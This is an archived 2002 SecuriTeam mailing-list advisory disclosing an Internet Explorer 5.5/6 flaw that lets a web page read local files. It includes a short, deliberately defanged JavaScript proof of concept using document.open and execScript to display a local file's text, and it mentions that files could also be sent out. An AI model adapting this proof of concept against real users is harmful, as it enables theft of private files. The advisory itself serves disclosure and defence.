[NT] More Reading of Local Files Vulnerabilities in MSIE

From: support@securiteam.com
Date: 01/14/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 14 Jan 2002 08:53:11 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  More Reading of Local Files Vulnerabilities in MSIE
------------------------------------------------------------------------

SUMMARY

There is a security vulnerability in IE 5.5 and 6 (probably other versions
as well) which allows reading and sending of local files. The problem lies
in the fact that you are able to access a local file's domain by calling
the execScript function on a newly created window. The sample exploit
provided can only read browser readable files however it is highly likely
that reading binary files is possible as well (By attaching an event to
the domain that calls the HTTP XML component, witch itself at the point of
writing is still vulnerable as well). In order for this exploit to work,
the file name must be known.

Further, if your exploit page is modified so that a website is opened
rather than a local file, the calling script can access the properties of
the website.

(NOTE, this vulnerability is similar in concept to:
<http://www.securiteam.com/windowsntfocus/6W00D2K3FS.html> Internet
Explorer 6 Allows Local File Reading (XMLHTTP))

DETAILS

Vulnerable systems:
Internet Explorer version 6 (Windows XP with all patches installed)
Internet Explorer version 5.5 (Windows ME)

Example:
(NOTE: SCRIPT's 'I' letter has been replaced with a !)
    <scr!pt language="javascript">
      
      var extDoc
      
      function doIt() {
        
        // open an external window and store the reference to it in extDoc
        
        extDoc =
document.open('file:///C:/jelmer.txt','jelmer','height=200,width=400,status=no,toolbar=no,menubar=no,location=no');
        
        // wait 2 seconds for the external window to load
        // then execute some javascript code that displays the body of the
document
        
        cmd = 'extDoc.execScript("alert(document.body.innerText)",
"Jscript");';
        setTimeout(cmd,2000);
        
      }
      
    </script>

Workaround:
Disable active scripting.

ADDITIONAL INFORMATION

The information has been provided by <mailto:jelmer@kuperus.xs4all.nl>
jelmer.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages